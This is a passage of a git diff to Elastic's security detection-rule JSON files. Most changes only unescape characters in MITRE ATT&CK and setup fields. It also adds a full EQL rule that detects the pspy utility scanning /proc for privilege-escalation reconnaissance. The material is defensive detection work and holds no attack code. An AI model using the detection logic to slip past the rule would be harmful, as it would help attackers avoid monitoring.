47, "rule_id": "bd2c86a0-8b61-4457-ab38-96943984e889", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", @@ -82,7 +82,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_107.json b/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_107.json index 13394c5474b..861a76f68be 100644 --- a/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_107.json +++ b/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_107.json @@ -48,7 +48,7 @@ ], "risk_score": 47, "rule_id": "bd2c86a0-8b61-4457-ab38-96943984e889", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", @@ -82,7 +82,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_108.json b/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_108.json index a2892450571..20d50cb62a9 100644 --- a/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_108.json +++ b/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_108.json @@ -48,7 +48,7 @@ ], "risk_score": 47, "rule_id": "bd2c86a0-8b61-4457-ab38-96943984e889", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", @@ -82,7 +82,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_109.json b/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_109.json index c1ace3d8913..f13ecd70dc3 100644 --- a/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_109.json +++ b/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_109.json @@ -48,7 +48,7 @@ ], "risk_score": 47, "rule_id": "bd2c86a0-8b61-4457-ab38-96943984e889", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", @@ -82,7 +82,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_110.json b/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_110.json index 3497d9693d6..769d52933d7 100644 --- a/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_110.json +++ b/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_110.json @@ -48,7 +48,7 @@ ], "risk_score": 47, "rule_id": "bd2c86a0-8b61-4457-ab38-96943984e889", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", @@ -82,7 +82,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_111.json b/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_111.json index 34343945cd7..163c54aee5e 100644 --- a/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_111.json +++ b/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_111.json @@ -48,7 +48,7 @@ ], "risk_score": 47, "rule_id": "bd2c86a0-8b61-4457-ab38-96943984e889", - "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", @@ -82,7 +82,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/bd3d058d-5405-4cee-b890-337f09366ba2_1.json b/packages/security_detection_engine/kibana/security_rule/bd3d058d-5405-4cee-b890-337f09366ba2_1.json index 00f2a8766aa..1e0d40bc51b 100644 --- a/packages/security_detection_engine/kibana/security_rule/bd3d058d-5405-4cee-b890-337f09366ba2_1.json +++ b/packages/security_detection_engine/kibana/security_rule/bd3d058d-5405-4cee-b890-337f09366ba2_1.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/bd7eefee-f671-494e-98df-f01daf9e5f17_102.json b/packages/security_detection_engine/kibana/security_rule/bd7eefee-f671-494e-98df-f01daf9e5f17_102.json index 554c56c0db6..57b616a87fe 100644 --- a/packages/security_detection_engine/kibana/security_rule/bd7eefee-f671-494e-98df-f01daf9e5f17_102.json +++ b/packages/security_detection_engine/kibana/security_rule/bd7eefee-f671-494e-98df-f01daf9e5f17_102.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/bd7eefee-f671-494e-98df-f01daf9e5f17_103.json b/packages/security_detection_engine/kibana/security_rule/bd7eefee-f671-494e-98df-f01daf9e5f17_103.json index 3d5556a9261..cd2c9bb8221 100644 --- a/packages/security_detection_engine/kibana/security_rule/bd7eefee-f671-494e-98df-f01daf9e5f17_103.json +++ b/packages/security_detection_engine/kibana/security_rule/bd7eefee-f671-494e-98df-f01daf9e5f17_103.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/bd7eefee-f671-494e-98df-f01daf9e5f17_104.json b/packages/security_detection_engine/kibana/security_rule/bd7eefee-f671-494e-98df-f01daf9e5f17_104.json index a47577c715d..b0412dcdf7f 100644 --- a/packages/security_detection_engine/kibana/security_rule/bd7eefee-f671-494e-98df-f01daf9e5f17_104.json +++ b/packages/security_detection_engine/kibana/security_rule/bd7eefee-f671-494e-98df-f01daf9e5f17_104.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_1.json b/packages/security_detection_engine/kibana/security_rule/bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_1.json index 75649fadb98..9ff540a6b98 100644 --- a/packages/security_detection_engine/kibana/security_rule/bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_1.json +++ b/packages/security_detection_engine/kibana/security_rule/bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_1.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Pspy Process Monitoring Detected", - "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "query": "sequence by process.pid, host.id with maxspan=5s\n[ file where host.os.type == \"linux\" and event.dataset == \"auditd_manager.auditd\" and \n auditd.data.syscall == \"openat\" and file.path == \"/proc\" and auditd.data.a0 : (\"ffffffffffffff9c\", \"ffffff9c\") and \n auditd.data.a2 : (\"80000\", \"88000\") ] with runs=10\n", "references": [ "https://github.com/DominicBreuker/pspy" @@ -67,7 +67,7 @@ ], "risk_score": 21, "rule_id": "bdb04043-f0e3-4efa-bdee-7d9d13fa9edc", - "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_2.json b/packages/security_detection_engine/kibana/security_rule/bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_2.json index e259fe681ab..ae693498317 100644 --- a/packages/security_detection_engine/kibana/security_rule/bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_2.json +++ b/packages/security_detection_engine/kibana/security_rule/bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_2.json @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_3.json b/packages/security_detection_engine/kibana/security_rule/bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_3.json index 3ffdb9520eb..1ca1776e9b6 100644 --- a/packages/security_detection_engine/kibana/security_rule/bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_3.json +++ b/packages/security_detection_engine/kibana/security_rule/bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_3.json @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_4.json b/packages/security_detection_engine/kibana/security_rule/bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_4.json index 5c4b1bc78f0..dbd9fdbea55 100644 --- a/packages/security_detection_engine/kibana/security_rule/bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_4.json +++ b/packages/security_detection_engine/kibana/security_rule/bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_4.json @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_5.json b/packages/security_detection_engine/kibana/security_rule/bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_5.json new file mode 100644 index 00000000000..871d1276bf0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_5.json @@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule leverages auditd to monitor for processes scanning different processes within the /proc directory using the openat syscall. This is a strong indication for the usage of the pspy utility. Attackers may leverage the pspy process monitoring utility to monitor system processes without requiring root permissions, in order to find potential privilege escalation vectors.", + "from": "now-9m", + "index": [ + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Pspy Process Monitoring Detected", + "query": "sequence by process.pid, host.id with maxspan=5s\n[ file where host.os.type == \"linux\" and event.dataset == \"auditd_manager.auditd\" and \n auditd.data.syscall == \"openat\" and file.path == \"/proc\" and auditd.data.a0 : (\"ffffffffffffff9c\", \"ffffff9c\") and \n auditd.data.a2 : (\"80000\", \"88000\") ] with runs=10\n", + "references": [ + "https://github.com/DominicBreuker/pspy" + ], + "related_integrations": [ + { + "integration": "auditd", + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "auditd.data.a0", + "type": "unknown" + }, + { + "ecs": false, + "name": "auditd.data.a2", + "type": "unknown" + }, + { + "ecs": false, + "name": "auditd.data.syscall", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + } + ], + "risk_score": 21, + "rule_id": "bdb04043-f0e3-4efa-bdee-7d9d13fa9edc", + "setup": "\nThis rule requires data coming in from Auditd Manager.\n\n### Auditd Manager Integration Setup\nThe Auditd Manager Integration receives audit events from the Linux Audit Framework which is a part of the Linux kernel.\nAuditd Manager provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"auditd_manager\" on a Linux System:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cAuditd Manager\u201d and select the integration to see more details about it.\n- Click \u201cAdd Auditd Manager\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201cauditd manager\u201d to an existing or a new agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/auditd_manager).\n\n#### Rule Specific Setup Note\nAuditd Manager subscribes to the kernel and receives events as they occur without any additional configuration.\nHowever, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n- For this detection rule the following additional audit rules are required to be added to the integration:\n -- \"-w /proc/ -p r -k audit_proc\"\n\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1057", + "name": "Process Discovery", + "reference": "https://attack.mitre.org/techniques/T1057/" + }, + { + "id": "T1082", + "name": "System Information Discovery", + "reference": "https://attack.mitre.org/techniques/T1082/" + } + ] + } + ], + "type": "eql", + "version": 5 + }, + "id": "bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bdcf646b-08d4-492c-870a-6c04e3700034_103.json b/packages/security_detection_engine/kibana/security_rule/bdcf646b-08d4-492c-870a-6c04e3700034_103.json index d4630750c41..d8483501801 100644 --- a/packages/security_detection_engine/kibana/security_rule/bdcf646b-08d4-492c-870a-6c04e3700034_103.json +++ b/packages/security_detection_engine/kibana/security_rule/bdcf646b-08d4-492c-870a-6c04e3700034_103.json @@ -56,7 +56,7 @@ ], "risk_score": 73, "rule_id": "bdcf646b-08d4-492c-870a-6c04e3700034", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -91,7 +91,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/bdcf646b-08d4-492c-870a-6c04e3700034_104.json b/packages/security_detection_engine/kibana/security_rule/bdcf646b-08d4-492c-870a-6c04e3700034_104.json index 8517ecf0b07..4ec836e40fc 100644 --- a/packages/security_detection_engine/kibana/security_rule/bdcf646b-08d4-492c-870a-6c04e3700034_104.json +++ b/packages/security_detection_engine/kibana/security_rule/bdcf646b-08d4-492c-870a-6c04e3700034_104.json @@ -51,7 +51,7 @@ ], "risk_score": 73, "rule_id": "bdcf646b-08d4-492c-870a-6c04e3700034", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/bdcf646b-08d4-492c-870a-6c04e3700034_105.json b/packages/security_detection_engine/kibana/security_rule/bdcf646b-08d4-492c-870a-6c04e3700034_105.json index 90ec7cc6851..83c10b5f19b 100644 --- a/packages/security_detection_engine/kibana/security_rule/bdcf646b-08d4-492c-870a-6c04e3700034_105.json +++ b/packages/security_detection_engine/kibana/security_rule/bdcf646b-08d4-492c-870a-6c04e3700034_105.json @@ -51,7 +51,7 @@ ], "risk_score": 73, "rule_id": "bdcf646b-08d4-492c-870a-6c04e3700034", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/bdcf646b-08d4-492c-870a-6c04e3700034_106.json b/packages/security_detection_engine/kibana/security_rule/bdcf646b-08d4-492c-870a-6c04e3700034_106.json index 66868568584..d566f09f878 100644 --- a/packages/security_detection_engine/kibana/security_rule/bdcf646b-08d4-492c-870a-6c04e3700034_106.json +++ b/packages/security_detection_engine/kibana/security_rule/bdcf646b-08d4-492c-870a-6c04e3700034_106.json @@ -51,7 +51,7 @@ ], "risk_score": 73, "rule_id": "bdcf646b-08d4-492c-870a-6c04e3700034", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom 